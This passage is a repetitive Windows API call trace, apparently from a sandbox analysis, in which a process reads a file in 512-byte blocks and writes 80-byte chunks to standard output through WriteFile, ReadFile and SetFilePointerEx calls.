(_FileHandle=1) returned 0x4c [0094.214] GetFileType (hFile=0x4c) returned 0x1 [0094.214] _get_osfhandle (_FileHandle=1) returned 0x4c [0094.214] GetFileType (hFile=0x4c) returned 0x1 [0094.214] _get_osfhandle (_FileHandle=1) returned 0x4c [0094.214] WriteFile (in: hFile=0x4c, lpBuffer=0x26f274*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26e458, lpOverlapped=0x0 | out: lpBuffer=0x26f274*, lpNumberOfBytesWritten=0x26e458*=0x50, lpOverlapped=0x0) returned 1 [0094.214] _get_osfhandle (_FileHandle=1) returned 0x4c [0094.214] GetFileType (hFile=0x4c) returned 0x1 [0094.214] _get_osfhandle (_FileHandle=1) returned 0x4c [0094.214] WriteFile (in: hFile=0x4c, lpBuffer=0x26f2c4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26e458, lpOverlapped=0x0 | out: lpBuffer=0x26f2c4*, lpNumberOfBytesWritten=0x26e458*=0x50, lpOverlapped=0x0) returned 1 [0094.214] _get_osfhandle (_FileHandle=1) returned 0x4c [0094.215] GetFileType (hFile=0x4c) returned 0x1 [0094.215] _get_osfhandle (_FileHandle=1) returned 0x4c [0094.215] WriteFile (in: hFile=0x4c, lpBuffer=0x26f314*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26e458, lpOverlapped=0x0 | out: lpBuffer=0x26f314*, lpNumberOfBytesWritten=0x26e458*=0x50, lpOverlapped=0x0) returned 1 [0094.215] _get_osfhandle (_FileHandle=1) returned 0x4c [0094.215] GetFileType (hFile=0x4c) returned 0x1 [0094.215] _get_osfhandle (_FileHandle=1) returned 0x4c [0094.215] WriteFile (in: hFile=0x4c, lpBuffer=0x26f364*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26e458, lpOverlapped=0x0 | out: lpBuffer=0x26f364*, lpNumberOfBytesWritten=0x26e458*=0x50, lpOverlapped=0x0) returned 1 [0094.215] _get_osfhandle (_FileHandle=1) returned 0x4c [0094.215] GetFileType (hFile=0x4c) returned 0x1 [0094.215] _get_osfhandle (_FileHandle=1) returned 0x4c [0094.215] WriteFile (in: hFile=0x4c, lpBuffer=0x26f3b4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26e458, lpOverlapped=0x0 | out: lpBuffer=0x26f3b4*, lpNumberOfBytesWritten=0x26e458*=0x50, lpOverlapped=0x0) returned 1 [0094.215] _get_osfhandle (_FileHandle=1) returned 0x4c [0094.215] GetFileType (hFile=0x4c) returned 0x1 [0094.215] _get_osfhandle (_FileHandle=1) returned 0x4c [0094.215] WriteFile (in: hFile=0x4c, lpBuffer=0x26f404*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26e458, lpOverlapped=0x0 | out: lpBuffer=0x26f404*, lpNumberOfBytesWritten=0x26e458*=0x50, lpOverlapped=0x0) returned 1 [0094.215] _get_osfhandle (_FileHandle=1) returned 0x4c [0094.215] GetFileType (hFile=0x4c) returned 0x1 [0094.215] _get_osfhandle (_FileHandle=1) returned 0x4c [0094.215] WriteFile (in: hFile=0x4c, lpBuffer=0x26f454*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x26e458, lpOverlapped=0x0 | out: lpBuffer=0x26f454*, lpNumberOfBytesWritten=0x26e458*=0x20, lpOverlapped=0x0) returned 1 [0094.215] _get_osfhandle (_FileHandle=4) returned 0x54 [0094.215] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x26e444 | out: lpNewFilePointer=0x0) returned 1 [0094.215] _get_osfhandle (_FileHandle=4) returned 0x54 [0094.215] ReadFile (in: hFile=0x54, lpBuffer=0x26f274, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26e464, lpOverlapped=0x0 | out: lpBuffer=0x26f274*, lpNumberOfBytesRead=0x26e464*=0x200, lpOverlapped=0x0) returned 1 [0094.215] _get_osfhandle (_FileHandle=1) returned 0x4c [0094.215] GetFileType (hFile=0x4c) returned 0x1 [0094.215] _get_osfhandle (_FileHandle=1) returned 0x4c [0094.215] GetFileType (hFile=0x4c) returned 0x1 [0094.215] _get_osfhandle (_FileHandle=1) returned 0x4c [0094.215] WriteFile (in: hFile=0x4c, lpBuffer=0x26f274*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26e458, lpOverlapped=0x0 | out: lpBuffer=0x26f274*, lpNumberOfBytesWritten=0x26e458*=0x50, lpOverlapped=0x0) returned 1 [0094.216] _get_osfhandle (_FileHandle=1) returned 0x4c [0094.216] GetFileType (hFile=0x4c) returned 0x1 [0094.216] _get_osfhandle (_FileHandle=1) returned 0x4c [0094.216] WriteFile (in: hFile=0x4c, lpBuffer=0x26f2c4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26e458, lpOverlapped=0x0 | out: lpBuffer=0x26f2c4*, lpNumberOfBytesWritten=0x26e458*=0x50, lpOverlapped=0x0) returned 1 [0094.216] _get_osfhandle (_FileHandle=1) returned 0x4c [0094.216] GetFileType (hFile=0x4c) returned 0x1 [0094.216] _get_osfhandle (_FileHandle=1) returned 0x4c [0094.216] WriteFile (in: hFile=0x4c, lpBuffer=0x26f314*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26e458, lpOverlapped=0x0 | out: lpBuffer=0x26f314*, lpNumberOfBytesWritten=0x26e458*=0x50, lpOverlapped=0x0) returned 1 [0094.216] _get_osfhandle (_FileHandle=1) returned 0x4c [0094.216] GetFileType (hFile=0x4c) returned 0x1 [0094.216] _get_osfhandle (_FileHandle=1) returned 0x4c [0094.216] WriteFile (in: hFile=0x4c, lpBuffer=0x26f364*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26e458, lpOverlapped=0x0 | out: lpBuffer=0x26f364*, lpNumberOfBytesWritten=0x26e458*=0x50, lpOverlapped=0x0) returned 1 [0094.216] _get_osfhandle (_FileHandle=1) returned 0x4c [0094.216] GetFileType (hFile=0x4c) returned 0x1 [0094.216] _get_osfhandle (_FileHandle=1) returned 0x4c [0094.216] WriteFile (in: hFile=0x4c, lpBuffer=0x26f3b4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26e458, lpOverlapped=0x0 | out: lpBuffer=0x26f3b4*, lpNumberOfBytesWritten=0x26e458*=0x50, lpOverlapped=0x0) returned 1 [0094.216] _get_osfhandle (_FileHandle=1) returned 0x4c [0094.216] GetFileType (hFile=0x4c) returned 0x1 [0094.216] _get_osfhandle (_FileHandle=1) returned 0x4c [0094.216] WriteFile (in: hFile=0x4c, lpBuffer=0x26f404*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26e458, lpOverlapped=0x0 | out: lpBuffer=0x26f404*, lpNumberOfBytesWritten=0x26e458*=0x50, lpOverlapped=0x0) returned 1 [0094.216] _get_osfhandle (_FileHandle=1) returned 0x4c [0094.216] GetFileType (hFile=0x4c) returned 0x1 [0094.216] _get_osfhandle (_FileHandle=1) returned 0x4c [0094.216] WriteFile (in: hFile=0x4c, lpBuffer=0x26f454*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x26e458, lpOverlapped=0x0 | out: lpBuffer=0x26f454*, lpNumberOfBytesWritten=0x26e458*=0x20, lpOverlapped=0x0) returned 1 [0094.217] _get_osfhandle (_FileHandle=4) returned 0x54 [0094.217] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x26e444 | out: lpNewFilePointer=0x0) returned 1 [0094.217] _get_osfhandle (_FileHandle=4) returned 0x54 [0094.217] ReadFile (in: hFile=0x54, lpBuffer=0x26f274, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26e464, lpOverlapped=0x0 | out: lpBuffer=0x26f274*, lpNumberOfBytesRead=0x26e464*=0x200, lpOverlapped=0x0) returned 1 [0094.217] _get_osfhandle (_FileHandle=1) returned 0x4c [0094.217] GetFileType (hFile=0x4c) returned 0x1 [0094.217] _get_osfhandle (_FileHandle=1) returned 0x4c [0094.217] GetFileType (hFile=0x4c) returned 0x1 [0094.217] _get_osfhandle (_FileHandle=1) returned 0x4c [0094.217] WriteFile (in: hFile=0x4c, lpBuffer=0x26f274*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26e458, lpOverlapped=0x0 | out: lpBuffer=0x26f274*, lpNumberOfBytesWritten=0x26e458*=0x50, lpOverlapped=0x0) returned 1 [0094.217] _get_osfhandle (_FileHandle=1) returned 0x4c [0094.217] GetFileType (hFile=0x4c) returned 0x1 [0094.217] _get_osfhandle (_FileHandle=1) returned 0x4c [0094.217] WriteFile (in: hFile=0x4c, lpBuffer=0x26f2c4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26e458, lpOverlapped=0x0 | out: lpBuffer=0x26f2c4*, lpNumberOfBytesWritten=0x26e458*=0x50, lpOverlapped=0x0) returned 1 [0094.217] _get_osfhandle (_FileHandle=1) returned 0x4c [0094.217] GetFileType (hFile=0x4c) returned 0x1 [0094.217] _get_osfhandle (_FileHandle=1) returned 0x4c [0094.217] WriteFile (in: hFile=0x4c, lpBuffer=0x26f314*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26e458, lpOverlapped=0x0 | out: lpBuffer=0x26f314*, lpNumberOfBytesWritten=0x26e458*=0x50, lpOverlapped=0x0) returned 1 [0094.217] _get_osfhandle (_FileHandle=1) returned 0x4c [0094.217] GetFileType (hFile=0x4c) returned 0x1 [0094.217] _get_osfhandle (_FileHandle=1) returned 0x4c [0094.217] WriteFile (in: hFile=0x4c, lpBuffer=0x26f364*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26e458, lpOverlapped=0x0 | out: lpBuffer=0x26f364*, lpNumberOfBytesWritten=0x26e458*=0x50, lpOverlapped=0x0) returned 1 [0094.217] _get_osfhandle (_FileHandle=1) returned 0x4c [0094.217] GetFileType (hFile=0x4c) returned 0x1 [0094.217] _get_osfhandle (_FileHandle=1) returned 0x4c [0094.218] WriteFile (in: hFile=0x4c, lpBuffer=0x26f3b4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26e458, lpOverlapped=0x0 | out: lpBuffer=0x26f3b4*, lpNumberOfBytesWritten=0x26e458*=0x50, lpOverlapped=0x0) returned 1 [0094.218] _get_osfhandle (_FileHandle=1) returned 0x4c [0094.218] GetFileType (hFile=0x4c) returned 0x1 [0094.218] _get_osfhandle (_FileHandle=1) returned 0x4c [0094.218] WriteFile (in: hFile=0x4c, lpBuffer=0x26f404*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26e458, lpOverlapped=0x0 | out: lpBuffer=0x26f404*, lpNumberOfBytesWritten=0x26e458*=0x50, lpOverlapped=0x0) returned 1 [0094.218] _get_osfhandle (_FileHandle=1) returned 0x4c [0094.218] GetFileType (hFile=0x4c) returned 0x1 [0094.218] _get_osfhandle (_FileHandle=1) returned 0x4c [0094.218] WriteFile (in: hFile=0x4c, lpBuffer=0x26f454*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x26e458, lpOverlapped=0x0 | out: lpBuffer=0x26f454*, lpNumberOfBytesWritten=0x26e458*=0x20, lpOverlapped=0x0) returned 1 [0094.218] _get_osfhandle (_FileHandle=4) returned 0x54 [0094.218] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x26e444 | out: lpNewFilePointer=0x0) returned 1 [0094.218] _get_osfhandle (_FileHandle=4) returned 0x54 [0094.218] ReadFile (in: hFile=0x54, lpBuffer=0x26f274, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26e464, lpOverlapped=0x0 | out: lpBuffer=0x26f274*, lpNumberOfBytesRead=0x26e464*=0x200, lpOverlapped=0x0) returned 1 [0094.218] _get_osfhandle (_FileHandle=1) returned 0x4c [0094.218] GetFileType (hFile=0x4c) returned 0x1 [0094.218] _get_osfhandle (_FileHandle=1) returned 0x4c [0094.218] GetFileType (hFile=0x4c) returned 0x1 [0094.218] _get_osfhandle (_FileHandle=1) returned 0x4c [0094.218] WriteFile (in: hFile=0x4c, lpBuffer=0x26f274*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26e458, lpOverlapped=0x0 | out: lpBuffer=0x26f274*, lpNumberOfBytesWritten=0x26e458*=0x50, lpOverlapped=0x0) returned 1 [0094.218] _get_osfhandle (_FileHandle=1) returned 0x4c [0094.218] GetFileType (hFile=0x4c) returned 0x1 [0094.218] _get_osfhandle (_FileHandle=1) returned 0x4c [0094.218] WriteFile (in: hFile=0x4c, lpBuffer=0x26f2c4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26e458, lpOverlapped=0x0 | out: lpBuffer=0x26f2c4*, lpNumberOfBytesWritten=0x26e458*=0x50, lpOverlapped=0x0) returned 1 [0094.218] _get_osfhandle (_FileHandle=1) returned 0x4c [0094.218] GetFileType (hFile=0x4c) returned 0x1 [0094.218] _get_osfhandle (_FileHandle=1) returned 0x4c [0094.218] WriteFile (in: hFile=0x4c, lpBuffer=0x26f314*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26e458, lpOverlapped=0x0 | out: lpBuffer=0x26f314*, lpNumberOfBytesWritten=0x26e458*=0x50, lpOverlapped=0x0) returned 1 [0094.218] _get_osfhandle (_FileHandle=1) returned 0x4c [0094.218] GetFileType (hFile=0x4c) returned 0x1 [0094.218] _get_osfhandle (_FileHandle=1) returned 0x4c [0094.218] WriteFile (in: hFile=0x4c, lpBuffer=0x26f364*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26e458, lpOverlapped=0x0 | out: lpBuffer=0x26f364*, lpNumberOfBytesWritten=0x26e458*=0x50, lpOverlapped=0x0) returned 1 [0094.218] _get_osfhandle (_FileHandle=1) returned 0x4c [0094.218] GetFileType (hFile=0x4c) returned 0x1 [0094.219] _get_osfhandle (_FileHandle=1) returned 0x4c [0094.219] WriteFile (in: hFile=0x4c, lpBuffer=0x26f3b4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26e458, lpOverlapped=0x0 | out: lpBuffer=0x26f3b4*, lpNumberOfBytesWritten=0x26e458*=0x50, lpOverlapped=0x0) returned 1 [0094.219] _get_osfhandle (_FileHandle=1) returned 0x4c [0094.219] GetFileType (hFile=0x4c) returned 0x1 [0094.219] _get_osfhandle (_FileHandle=1) returned 0x4c [0094.219] WriteFile (in: hFile=0x4c, lpBuffer=0x26f404*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26e458, lpOverlapped=0x0 | out: lpBuffer=0x26f404*, lpNumberOfBytesWritten=0x26e458*=0x50, lpOverlapped=0x0) returned 1 [0094.219] _get_osfhandle (_FileHandle=1) returned 0x4c [0094.219] GetFileType (hFile=0x4c) returned 0x1 [0094.219] _get_osfhandle (_FileHandle=1) returned 0x4c [0094.219] WriteFile (in: hFile=0x4c, lpBuffer=0x26f454*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x26e458, lpOverlapped=0x0 | out: lpBuffer=0x26f454*, lpNumberOfBytesWritten=0x26e458*=0x20, lpOverlapped=0x0) returned 1 [0094.219] _get_osfhandle (_FileHandle=4) returned 0x54 [0094.219] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x26e444 | out: lpNewFilePointer=0x0) returned 1 [0094.219] _get_osfhandle (_FileHandle=4) returned 0x54 [0094.219] ReadFile (in: hFile=0x54, lpBuffer=0x26f274, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26e464, lpOverlapped=0x0 | out: lpBuffer=0x26f274*, lpNumberOfBytesRead=0x26e464*=0x200, lpOverlapped=0x0) returned 1 [0094.219] _get_osfhandle (_FileHandle=1) returned 0x4c [0094.219] GetFileType (hFile=0x4c) returned 0x1 [0094.219] _get_osfhandle (_FileHandle=1) returned 0x4c [0094.219] GetFileType (hFile=0x4c) returned 0x1 [0094.219] _get_osfhandle (_FileHandle=1) returned 0x4c [0094.219] WriteFile (in: hFile=0x4c, lpBuffer=0x26f274*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26e458, lpOverlapped=0x0 | out: lpBuffer=0x26f274*, lpNumberOfBytesWritten=0x26e458*=0x50, lpOverlapped=0x0) returned 1 [0094.219] _get_osfhandle (_FileHandle=1) returned 0x4c [0094.219] GetFileType (hFile=0x4c) returned 0x1 [0094.219] _get_osfhandle (_FileHandle=1) returned 0x4c [0094.219] WriteFile (in: hFile=0x4c, lpBuffer=0x26f2c4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26e458, lpOverlapped=0x0 | out: lpBuffer=0x26f2c4*, lpNumberOfBytesWritten=0x26e458*=0x50, lpOverlapped=0x0) returned 1 [0094.219] _get_osfhandle (_FileHandle=1) returned 0x4c [0094.219] GetFileType (hFile=0x4c) returned 0x1 [0094.219] _get_osfhandle (_FileHandle=1) returned 0x4c [0094.220] WriteFile (in: hFile=0x4c, lpBuffer=0x26f314*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26e458, lpOverlapped=0x0 | out: lpBuffer=0x26f314*, lpNumberOfBytesWritten=0x26e458*=0x50, lpOverlapped=0x0) returned 1 [0094.220] _get_osfhandle (_FileHandle=1) returned 0x4c [0094.220] GetFileType (hFile=0x4c) returned 0x1 [0094.220] _get_osfhandle (_FileHandle=1) returned 0x4c [0094.220] WriteFile (in: hFile=0x4c, lpBuffer=0x26f364*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26e458, lpOverlapped=0x0 | out: lpBuffer=0x26f364*, lpNumberOfBytesWritten=0x26e458*=0x50, lpOverlapped=0x0) returned 1 [0094.220] _get_osfhandle (_FileHandle=1) returned 0x4c [0094.220] GetFileType (hFile=0x4c) returned 0x1 [0094.220] _get_osfhandle (_FileHandle=1) returned 0x4c [0094.220] WriteFile (in: hFile=0x4c, lpBuffer=0x26f3b4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26e458, lpOverlapped=0x0 | out: lpBuffer=0x26f3b4*, lpNumberOfBytesWritten=0x26e458*=0x50, lpOverlapped=0x0) returned 1 [0094.220] _get_osfhandle (_FileHandle=1) returned 0x4c [0094.220] GetFileType (hFile=0x4c) returned 0x1 [0094.220] _get_osfhandle (_FileHandle=1) returned 0x4c [0094.220] WriteFile (in: hFile=0x4c, lpBuffer=0x26f404*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26e458, lpOverlapped=0x0 | out: lpBuffer=0x26f404*, lpNumberOfBytesWritten=0x26e458*=0x50, lpOverlapped=0x0) returned 1 [0094.220] _get_osfhandle (_FileHandle=1) returned 0x4c [0094.220] GetFileType (hFile=0x4c) returned 0x1 [0094.220] _get_osfhandle (_FileHandle=1) returned 0x4c [0094.220] WriteFile (in: hFile=0x4c, lpBuffer=0x26f454*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x26e458, lpOverlapped=0x0 | out: lpBuffer=0x26f454*, lpNumberOfBytesWritten=0x26e458*=0x20, lpOverlapped=0x0) returned 1 [0094.220] _get_osfhandle (_FileHandle=4) returned 0x54 [0094.220] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x26e444 | out: lpNewFilePointer=0x0) returned 1 [0094.220] _get_osfhandle (_FileHandle=4) returned 0x54 [0094.220] ReadFile (in: hFile=0x54, lpBuffer=0x26f274, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26e464, lpOverlapped=0x0 | out: lpBuffer=0x26f274*, lpNumberOfBytesRead=0x26e464*=0x200, lpOverlapped=0x0) returned 1 [0094.220] _get_osfhandle (_FileHandle=1) returned 0x4c [0094.220] GetFileType (hFile=0x4c) returned 0x1 [0094.220] _get_osfhandle (_FileHandle=1) returned 0x4c [0094.220] GetFileType (hFile=0x4c) returned 0x1 [0094.220] _get_osfhandle (_FileHandle=1) returned 0x4c [0094.220] WriteFile (in: hFile=0x4c, lpBuffer=0x26f274*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26e458, lpOverlapped=0x0 | out: lpBuffer=0x26f274*, lpNumberOfBytesWritten=0x26e458*=0x50, lpOverlapped=0x0) returned 1 [0094.220] _get_osfhandle (_FileHandle=1) returned 0x4c [0094.220] GetFileType (hFile=0x4c) returned 0x1 [0094.220] _get_osfhandle (_FileHandle=1) returned 0x4c [0094.220] WriteFile (in: hFile=0x4c, lpBuffer=0x26f2c4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26e458, lpOverlapped=0x0 | out: lpBuffer=0x26f2c4*, lpNumberOfBytesWritten=0x26e458*=0x50, lpOverlapped=0x0) returned 1 [0094.221] _get_osfhandle (_FileHandle=1) returned 0x4c [0094.221] GetFileType (hFile=0x4c) returned 0x1 [0094.221] _get_osfhandle (_FileHandle=1) returned 0x4c [0094.221] WriteFile (in: hFile=0x4c, lpBuffer=0x26f314*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26e458, lpOverlapped=0x0 | out: lpBuffer=0x26f314*, lpNumberOfBytesWritten=0x26e458*=0x50, lpOverlapped=0x0) returned 1 [0094.221] _get_osfhandle (_FileHandle=1) returned 0x4c [0094.221] GetFileType (hFile=0x4c) returned 0x1 [0094.221] _get_osfhandle (_FileHandle=1) returned 0x4c [0094.221] WriteFile (in: hFile=0x4c, lpBuffer=0x26f364*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26e458, lpOverlapped=0x0 | out: lpBuffer=0x26f364*, lpNumberOfBytesWritten=0x26e458*=0x50, lpOverlapped=0x0) returned 1 [0094.221] _get_osfhandle (_FileHandle=1) returned 0x4c [0094.221] GetFileType (hFile=0x4c) returned 0x1 [0094.221] _get_osfhandle (_FileHandle=1) returned 0x4c [0094.221] WriteFile (in: hFile=0x4c, lpBuffer=0x26f3b4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26e458, lpOverlapped=0x0 | out: lpBuffer=0x26f3b4*, lpNumberOfBytesWritten=0x26e458*=0x50, lpOverlapped=0x0) returned 1 [0094.221] _get_osfhandle (_FileHandle=1) returned 0x4c [0094.221] GetFileType (hFile=0x4c) returned 0x1 [0094.221] _get_osfhandle (_FileHandle=1) returned 0x4c [0094.221] WriteFile (in: hFile=0x4c, lpBuffer=0x26f404*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26e458, lpOverlapped=0x0 | out: lpBuffer=0x26f404*, lpNumberOfBytesWritten=0x26e458*=0x50, lpOverlapped=0x0) returned 1 [0094.221] _get_osfhandle (_FileHandle=1) returned 0x4c [0094.221] GetFileType (hFile=0x4c) returned 0x1 [0094.221] _get_osfhandle (_FileHandle=1) returned 0x4c [0094.221] WriteFile (in: hFile=0x4c, lpBuffer=0x26f454*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x26e458, lpOverlapped=0x0 | out: lpBuffer=0x26f454*, lpNumberOfBytesWritten=0x26e458*=0x20, lpOverlapped=0x0) returned 1 [0094.221] _get_osfhandle (_FileHandle=4) returned 0x54 [0094.221] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x26e444 | out: lpNewFilePointer=0x0) returned 1 [0094.221] _get_osfhandle (_FileHandle=4) returned 0x54 [0094.221] ReadFile (in: hFile=0x54, lpBuffer=0x26f274, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26e464, lpOverlapped=0x0 | out: lpBuffer=0x26f274*, lpNumberOfBytesRead=0x26e464*=0x200, lpOverlapped=0x0) returned 1 [0094.221] _get_osfhandle (_FileHandle=1) returned 0x4c [0094.221] GetFileType (hFile=0x4c) returned 0x1 [0094.221] _get_osfhandle (_FileHandle=1) returned 0x4c [0094.221] GetFileType (hFile=0x4c) returned 0x1 [0094.221] _get_osfhandle (_FileHandle=1) returned 0x4c [0094.221] WriteFile (in: hFile=0x4c, lpBuffer=0x26f274*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26e458, lpOverlapped=0x0 | out: lpBuffer=0x26f274*, lpNumberOfBytesWritten=0x26e458*=0x50, lpOverlapped=0x0) returned 1 [0094.221] _get_osfhandle (_FileHandle=1) returned 0x4c [0094.221] GetFileType (hFile=0x4c) returned 0x1 [0094.221] _get_osfhandle (_FileHandle=1) returned 0x4c [0094.221] WriteFile (in: hFile=0x4c, lpBuffer=0x26f2c4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26e458, lpOverlapped=0x0 | out: lpBuffer=0x26f2c4*, lpNumberOfBytesWritten=0x26e458*=0x50, lpOverlapped=0x0) returned 1 [0094.222] _get_osfhandle (_FileHandle=1) returned 0x4c [0094.222] GetFileType (hFile=0x4c) returned 0x1 [0094.222] _get_osfhandle (_FileHandle=1) returned 0x4c [0094.222] WriteFile (in: hFile=0x4c, lpBuffer=0x26f314*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26e458, lpOverlapped=0x0 | out: lpBuffer=0x26f314*, lpNumberOfBytesWritten=0x26e458*=0x50, lpOverlapped=0x0) returned 1 [0094.222] _get_osfhandle (_FileHandle=1) returned 0x4c [0094.222] GetFileType (hFile=0x4c) returned 0x1 [0094.222] _get_osfhandle (_FileHandle=1) returned 0x4c [0094.222] WriteFile (in: hFile=0x4c, lpBuffer=0x26f364*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26e458, lpOverlapped=0x0 | out: lpBuffer=0x26f364*, lpNumberOfBytesWritten=0x26e458*=0x50, lpOverlapped=0x0) returned 1 [0094.222] _get_osfhandle (_FileHandle=1) returned 0x4c [0094.222] GetFileType (hFile=0x4c) returned 0x1 [0094.222] _get_osfhandle (_FileHandle=1) returned 0x4c [0094.222] WriteFile (in: hFile=0x4c, lpBuffer=0x26f3b4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26e458, lpOverlapped=0x0 | out: lpBuffer=0x26f3b4*, lpNumberOfBytesWritten=0x26e458*=0x50, lpOverlapped=0x0) returned 1 [0094.222] _get_osfhandle (_FileHandle=1) returned 0x4c [0094.222] GetFileType (hFile=0x4c) returned 0x1 [0094.222] _get_osfhandle (_FileHandle=1) returned 0x4c [0094.222] WriteFile (in: hFile=0x4c, lpBuffer=0x26f404*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26e458, lpOverlapped=0x0 | out: lpBuffer=0x26f404*, lpNumberOfBytesWritten=0x26e458*=0x50, lpOverlapped=0x0) returned 1 [0094.222] _get_osfhandle (_FileHandle=1) returned 0x4c [0094.222] GetFileType (hFile=0x4c) returned 0x1 [0094.222] _get_osfhandle (_FileHandle=1) returned 0x4c [0094.222] WriteFile (in: hFile=0x4c, lpBuffer=0x26f454*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x26e458, lpOverlapped=0x0 | out: lpBuffer=0x26f454*, lpNumberOfBytesWritten=0x26e458*=0x20, lpOverlapped=0x0) returned 1 [0094.222] _get_osfhandle (_FileHandle=4) returned 0x54 [0094.222] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x26e444 | out: lpNewFilePointer=0x0) returned 1 [0094.222] _get_osfhandle (_FileHandle=4) returned 0x54 [0094.222] ReadFile (in: hFile=0x54, lpBuffer=0x26f274, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26e464, lpOverlapped=0x0 | out: lpBuffer=0x26f274*, lpNumberOfBytesRead=0x26e464*=0x200, lpOverlapped=0x0) returned 1 [0094.222] _get_osfhandle (_FileHandle=1) returned 0x4c [0094.222] GetFileType (hFile=0x4c) returned 0x1 [0094.222] _get_osfhandle (_FileHandle=1) returned 0x4c [0094.222] GetFileType (hFile=0x4c) returned 0x1 [0094.222] _get_osfhandle (_FileHandle=1) returned 0x4c [0094.222] WriteFile (in: hFile=0x4c, lpBuffer=0x26f274*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26e458, lpOverlapped=0x0 | out: lpBuffer=0x26f274*, lpNumberOfBytesWritten=0x26e458*=0x50, lpOverlapped=0x0) returned 1 [0094.222] _get_osfhandle (_FileHandle=1) returned 0x4c [0094.222] GetFileType (hFile=0x4c) returned 0x1 [0094.222] _get_osfhandle (_FileHandle=1) returned 0x4c [0094.222] WriteFile (in: hFile=0x4c, lpBuffer=0x26f2c4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26e458, lpOverlapped=0x0 | out: lpBuffer=0x26f2c4*, lpNumberOfBytesWritten=0x26e458*=0x50, lpOverlapped=0x0) returned 1 [0094.223] _get_osfhandle (_FileHandle=1) returned 0x4c [0094.223] GetFileType (hFile=0x4c) returned 0x1 [0094.223] _get_osfhandle (_FileHandle=1) returned 0x4c [0094.223] WriteFile (in: hFile=0x4c, lpBuffer=0x26f314*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26e458, lpOverlapped=0x0 | out: lpBuffer=0x26f314*, lpNumberOfBytesWritten=0x26e458*=0x50, lpOverlapped=0x0) returned 1 [0094.223] _get_osfhandle (_FileHandle=1) returned 0x4c [0094.223] GetFileType (hFile=0x4c) returned 0x1 [0094.223] _get_osfhandle (_FileHandle=1) returned 0x4c [0094.223] WriteFile (in: hFile=0x4c, lpBuffer=0x26f364*, nNumberOfBytesToWrite=0x50, 